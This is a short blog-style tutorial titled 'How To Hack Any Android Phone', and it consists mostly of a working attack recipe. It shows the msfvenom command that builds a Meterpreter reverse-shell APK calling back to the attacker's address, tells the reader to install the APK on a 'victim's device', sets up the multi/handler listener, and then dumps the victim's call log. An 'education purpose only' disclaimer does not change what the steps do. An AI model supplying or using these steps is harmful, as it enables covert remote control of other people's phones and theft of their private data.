How To Hack Any Android Phone Using Metasploit (Msfvenom)

Hello, Guys Today I Will Tell You How To Hack Any Android Phone Using Msfvenom (Metasploit).

Metasploit logo

* Warning *
1. It's for Education Purpose Only.
2. All Attacks Done With Own Cellphone.
3. Don't Use In Illegal Works.

*  Requirements  *
1. Kali Linux Installed Pc (You Can Run Also Live Mode) (How To Run In Live Mode)
2. Some Knowledge About Kali Linux (Not Higher Requirement Follow My Steps Only)  
3. Some Patience.

1.Open Your Terminal Window And Type ifconfig Hit Enter.
2.Copy Your Local Ip Address (You Can Use Your Public Ip Also Via PORT Forwarding)

3.Open New Terminal And Type msfconsole And Hit Enter.

4. Now Type msfvenom -p android/meterpreter/reverse_tcp lhost=YourIP lport=4444(It'sA Default) R -o /root/Desktop/Yourfile.apk And Hit Enter.

msfvenom -p android/meterpreter/reverse_tcp lhost=YourIP lport=4444(It'sA Default) R -o /root/Desktop/Yourfile.apk
5. Now Our Apk is Created So Put Apk In Victim's Device and install it And Open it.
6. Now Type use multi/handler Hit Enter
7.Then Type set PAYLOAD android/meterpreter/reverse_tcp Hit Enter.
8.Then Type set LHOST YourIP Hit Enter.
9.Then Type set LPORT 4444 (Default Port)
10. Now Type exploit And Hit Enter. Now You Are Connected With Victim's Cellphone.

Read Carefully

11. If You Want Hack Victim's Calllog Type dump_calllog Hit Enter.

dump_calllog Modified
12. Below Is Some Useful Commands.

13.That's It. Thank You.